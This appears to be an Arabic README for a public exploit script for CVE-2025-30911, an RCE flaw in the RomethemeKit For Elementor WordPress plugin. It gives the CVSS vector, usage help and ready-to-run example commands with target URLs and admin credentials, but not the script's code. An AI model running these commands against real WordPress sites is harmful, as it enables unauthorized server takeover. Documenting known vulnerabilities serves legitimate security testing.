
إضافة RomethemeKit For Elementor الخاصة بـ WordPress في الإصدارات <= 1.5.4 معرّضة لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE)
هذا السكربت يستغل ثغرة خطيرة في إضافة RomethemeKit For Elementor لووردبريس (الإصدار <= v1.5.4) تسمح بـ تثبيت وتفعيل إضافات تعسفي للمستخدمين المصادق عليهم، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE).
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Hتسمح الثغرة لمهاجم مصادق (بصلاحية Administrator) بتثبيت وتفعيل أي إضافة برمجيًا — بما في ذلك الإضافات الخبيثة — مما قد يؤدي إلى تنفيذ كامل للتعليمات البرمجية على الخادم.
python3 CVE-2025-30911.py -u http://target/wordpress -un admin -p password -pl hello-dolly/hello.php
usage:
CVE-2025-30911.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit For CVE-2025-30911 | By Nxploited Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Base URL of the WordPress site
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
-pl, --plugin PLUGIN Plugin to install (default: hello-dolly/hello.php)
python3 CVE-2025-30911.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl hello-dolly/hello.php
requests (ثبّتها عبر pip install requests)هذه الأداة مقدمة لأغراض تعليمية وللاختبارات الأمنية المصرح بها فقط. الاستخدام غير المصرح به غير قانوني وغير أخلاقي.
بواسطة: Nxploited | Khaled Alenazi